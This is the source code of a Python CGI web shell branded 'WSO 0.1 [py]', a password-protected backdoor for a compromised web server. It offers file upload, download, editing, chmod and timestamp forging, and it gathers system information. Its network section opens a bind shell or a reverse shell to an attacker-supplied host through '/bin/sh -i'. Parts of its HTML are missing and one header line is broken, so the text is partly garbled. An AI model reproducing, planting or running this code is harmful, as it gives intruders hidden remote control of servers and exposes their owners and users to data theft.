#!/usr/bin/env python
import sys, os, cgi, commands, time, Cookie, socket
from stat import *
from datetime import datetime
sys.stderr = open(os.devnull, 'w')
password = "63a9f0ea7bb98050796b649e85481845"
version = "0.1 [py]"
def getall(theform, nolist = False):
data = {}
for field in theform.keys():
if type(theform[field]) == type([]):
if not nolist:
data[field] = theform.getlist(field)
else:
data[field] = theform.getfirst(field)
elif theform[field].filename:
_FILES[field] = theform[field]
else:
data[field] = theform[field].value
return data
def escape(str):
return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n")
_FILES = {}
_REQUEST = getall( cgi.FieldStorage() )
if _REQUEST.has_key('charset') == False:
_REQUEST['charset'] = "Windows-1251"
if _REQUEST.has_key('a') == False:
_REQUEST['a'] = "files"
if _REQUEST.has_key('c') == False:
_REQUEST['c'] = os.getcwd()
if _REQUEST.has_key('p1') == False:
_REQUEST['p1'] = ""
if _REQUEST.has_key('p2') == False:
_REQUEST['p2'] = ""
if _REQUEST.has_key('p3') == False:
_REQUEST['p3'] = ""
_COOKIE = Cookie.SimpleCookie()
try:
_COOKIE.load(os.environ["HTTP_COOKIE"])
except:
pass
def printLogin():
_COOKIE['psswd'] = "";
print _COOKIE;
print "Content-type: text/html\n";
print """"""
exit()
if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 :
if _COOKIE['psswd'].value != password:
printLogin()
elif _REQUEST.has_key('psswd'):
try:
import hashlib
psswd = hashlib.md5()
except:
import md5
psswd = md5.new()
psswd.update(_REQUEST['psswd'])
if psswd.hexdigest() != password:
printLogin()
else:
_COOKIE['psswd'] = psswd.hexdigest()
else:
printLogin()
print _COOKIE
home_dir = os.getcwd()
try:
os.chdir(_REQUEST['c'])
except os.error, msg:
pass
cwd = os.getcwd();
if cwd[-1] != '/':
cwd += '/'
def printHeader():
print "Content-type: text/html\n";
" + os.environ["SERVER_NAME"] + " - WSO " + version + """ print "<meta http-equiv='Content-Type' content='text/html; charset=" + _REQUEST['charset'] + "'><title>" + os.environ["SERVER_NAME"] + " - WSO " + version + """</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color:#df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,"Courier New"; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
pre,.m{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '""" + escape(_REQUEST['c']) + """';
var a_ = '""" + escape(_REQUEST['a']) + """';
var p1_ = '""" + escape(_REQUEST['p1']) + """';
var p2_ = '""" + escape(_REQUEST['p2']) + """';
var p3_ = '""" + escape(_REQUEST['p3']) + """';
var charset_ = '""" + escape( _REQUEST['charset'] ) + """';
function g(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
document.mf.submit();
}
</script>
<div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
"""
print '<table class=info cellpadding=3 cellspacing=0 width=100%><td width=1><span>Uname:
User:
Time:
Cwd:</span>'
print '<nobr>'
for x in os.uname():
sys.stdout.write(x+' ')
t = time.localtime()
print '</nobr>
%s
%d-%.2d-%.2d %.2d:%.2d:%.2d <span>Server IP:</span> %s <span>Client IP:</span> %s
' %( commands.getoutput( 'id' ), t[0], t[1], t[2], t[3], t[4], t[5], os.environ['SERVER_ADDR'], os.environ['REMOTE_ADDR'])
path = ''
paths = cwd.split('/')
paths.pop()
for x in paths:
path += x + '/'
sys.stdout.write("""<a href="#" onclick="g('files','"""+escape(path)+"""', '', '', '')">"""+x+"""/</a>""")
print " " + permsColor(cwd),"""<a href='#' onclick="g('files','"""+ escape( home_dir ) +"""', '', '', '')">[ home ]</a>"""
charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866']
print '<td width=1 align=right><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'
for charset in charsets:
sys.stdout.write('<option value="%s" ' % charset)
if _REQUEST['charset'] == charset:
sys.stdout.write('selected')
sys.stdout.write('>%s</option>' % charset)
print '</optgroup></select>
|
<table style="border-top:2px solid #333;text-align: center;" cellpadding=3 cellspacing=0 width=100%>'
for x in ['Files', 'Console', 'Python', 'Network']:
print "<td width='100px'>[ <a href='#' onclick='g(\""+x.lower()+'", null, "", "", "")\'>'+x+'</a> ]'
print ' |
<div style="margin:5">'
def printFooter():
if os.access (cwd, os.W_OK):
writable = "<font color=green>[ Writeable ]</font>"
else:
writable = "<font color=red>[ Not writable ]</font>"
print """</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style="border-top:2px solid #333;border-bottom:2px solid #333;">
|
|
"""+writable+""" |
"""+writable+""" |
|
"""+writable+""" |
</div>
"""
def viewSize(s):
if s >= 1073741824:
return "%1.2f GB" % (s / 1073741824.0);
elif s >= 1048576:
return "%1.2f MB" % (s / 1048576.0);
elif s >= 1024:
return "%1.2f KB" % (s / 1024.0);
else:
return str(s) + ' B';
def perms(p):
mode = os.lstat(p)[ST_MODE]
p = mode
i="";
if (p & 0xC000) == 0xC000:
i = 's'
elif (p & 0xA000) == 0xA000:
i = 'l'
elif (p & 0x8000) == 0x8000:
i = '-'
elif (p & 0x6000) == 0x6000:
i = 'b'
elif (p & 0x4000) == 0x4000:
i = 'd'
elif (p & 0x2000) == 0x2000:
i = 'c'
elif (p & 0x1000) == 0x1000:
i = 'p'
else:
i = 'u'
if p & 0x0100: i += 'r'
else: i += '-'
if p & 0x0080: i += 'w'
else: i += '-'
if p & 0x0040:
if p & 0x0800: i += 's'
else: i += 'x'
else:
if p & 0x0800: i += 'S'
else: i+='-'
if p & 0x0020: i += 'r'
else: i += '-'
if p & 0x0010: i += 'w'
else: i += '-'
if p & 0x0008:
if p & 0x0400: i += 's'
else: i += 'x'
else:
if p & 0x0400: i += 'S'
else: i += '-'
if p & 0x0004: i += 'r'
else: i += '-'
if p & 0x0002: i += 'w'
else: i += '-'
if p & 0x0001:
if p & 0x0200: i += 't'
else: i += 'x'
else:
if p & 0x0200: i += 'T'
else: i += '-'
return i;
def permsColor(path):
if not os.access (path, os.R_OK):
return "<font color='#FF0000'>"+perms(path)+"</font>"
elif os.access (path, os.W_OK):
return "<font color='#00BB00'>"+perms(path)+"</font>"
else:
return "<font color='white'>"+perms(path)+"</font>"
def actionConsole():
printHeader()
print "Console
<div class=content>"
print """</div><script>document.cf.cmd.focus();</script>"
printFooter()
def actionFiles():
printHeader()
if _REQUEST['p1'] == 'uploadFile':
try:
if _FILES['f'].filename:
fn = os.path.basename(_FILES['f'].filename)
open(fn, 'wb').write(_FILES['f'].file.read())
except: pass
if _REQUEST['p1'] == 'mkdir':
try: os.mkdir(_REQUEST['p2'])
except: pass
print "File manager
<div class=content>"
item_stat = os.lstat('..')
def dirItemInfo(name, item_stat):
if S_ISLNK(item_stat[ST_MODE]):
type = "link"
else:
type = "dir"
tmp = {
'name' : name,
'path' : os.path.join(cwd, name),
'size' : viewSize(item_stat[ST_SIZE]),
'mtime' : datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S"),
'uid' : str(item_stat[ST_UID]),
'gid' : str(item_stat[ST_GID]),
'perms' : permsColor(name),
'type' : type
}
return tmp
dirs = [dirItemInfo('..', os.lstat('..'))]
files = []
for item in os.listdir(cwd):
item_stat = os.lstat(item)
mode = item_stat[ST_MODE]
tmp = dirItemInfo(item, item_stat)
if S_ISLNK(mode) or S_ISDIR(mode):
dirs.append(tmp)
elif S_ISREG(mode):
files.append(tmp)
print "<table width='100%' class='main' cellspacing='0' cellpadding='2'></div>"
printFooter()
def actionFileTools():
if _REQUEST['p2'] == "":
_REQUEST['p2'] = "view"
if _REQUEST['p2'] == "download":
print "Content-Disposition: attachment; filename=" + os.path.basename(_REQUEST['p1']) + "\n"
try:
fp = open(_REQUEST['p1'], 'rb')
for x in fp.readlines():
sys.stdout.write(x)
fp.close()
except: pass
return
if _REQUEST['p2'] == "save":
try:
fp = open(_REQUEST['p1'], 'w')
fp.write(_REQUEST['p3'])
fp.close()
except: pass
_REQUEST['p2'] = 'edit'
printHeader()
print "File tools
<div class=content>"
item_stat = os.stat(_REQUEST['p1'])
print "<span>File: </span>" + os.path.basename(_REQUEST['p1']) + " <span>Size: </span> " +viewSize(item_stat[ST_SIZE]) + " <span>Permission:</span> " +permsColor(_REQUEST['p1'])
print "<br/>"
if S_ISDIR(item_stat[ST_MODE]):
menu = ['Chmod', 'Rename', 'Touch']
else:
menu = ['View', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch']
for x in menu:
print "<a href=# onclick=\"g(null, null, null, '"+x.lower()+"')\">"
if x.lower() == _REQUEST['p2']:
print "[ " + x + " ]"
else:
print x
print "</a> "
print "
";
if _REQUEST['p2'] == "view":
try:
fp = open(_REQUEST['p1'], 'r')
print "<pre class=ml1>"
for x in fp.readlines():
sys.stdout.write(cgi.escape(x))
fp.close()
print "</pre>"
except:
print "Can't open file! "+_REQUEST['p1']
if _REQUEST['p2'] == "edit":
try:
fp = open(_REQUEST['p1'], 'r')
print ""
except:
print "Can't open (create) file! "+_REQUEST['p1']
if _REQUEST['p2'] == "chmod":
import stat, string
if len(_REQUEST['p3']):
perm = string.atoi(_REQUEST['p3'], 8)
try:
os.chmod(_REQUEST['p1'], perm)
print "Done"
except: print "Fail!"
print ""
if _REQUEST['p2'] == "rename":
if len(_REQUEST['p3']):
try:
os.rename(_REQUEST['p1'], _REQUEST['p3'])
_REQUEST['p1'] = _REQUEST['p3']
print "Done<script>p2_='" + escape(_REQUEST['p3']) + "'</script>"
except: print "Fail!"
print ""
if _REQUEST['p2'] == "touch":
if len(_REQUEST['p3']):
try:
tmstmp = time.mktime(time.strptime(_REQUEST['p3'], "%Y-%m-%d %H:%M:%S"))
os.utime(_REQUEST['p1'], (tmstmp, tmstmp))
item_stat = os.stat(_REQUEST['p1'])
print "Done"
except: print "Fail!"
print ""
print "</div>"
printFooter()
def actionPython():
printHeader()
print "Exec python code
<div class=content>"
print """</div>"
printFooter()
def actionNetwork():
printHeader()
print """Network tools
<div class=content>
"""
if _REQUEST['p1'] != "":
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
if _REQUEST['p1'] == "bp":
try:
sock.bind(('localhost', int(_REQUEST['p2'])))
sock.listen(0)
except:
print "error"
else:
print "done"
if os.fork()!=0:
(c,addr)=sock.accept()
os.dup2(c.fileno(), 0)
os.dup2(c.fileno(), 1)
os.dup2(c.fileno(), 2)
os.system('/bin/sh -i')
c.shutdown(2)
sock.shutdown(2)
elif _REQUEST['p1'] == "bc":
try:
sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) )
except:
print "error"
else:
print "done"
if os.fork()!=0:
os.dup2(sock.fileno(), 0)
os.dup2(sock.fileno(), 1)
os.dup2(sock.fileno(), 2)
os.system('/bin/sh -i')
sock.shutdown(2)
print "</div>"
printFooter()
try:
{
'files' : actionFiles,
'fileTools' : actionFileTools,
'console' : actionConsole,
'python' : actionPython,
'network' : actionNetwork
}[_REQUEST['a']]()
except KeyError:
printHeader()
printFooter()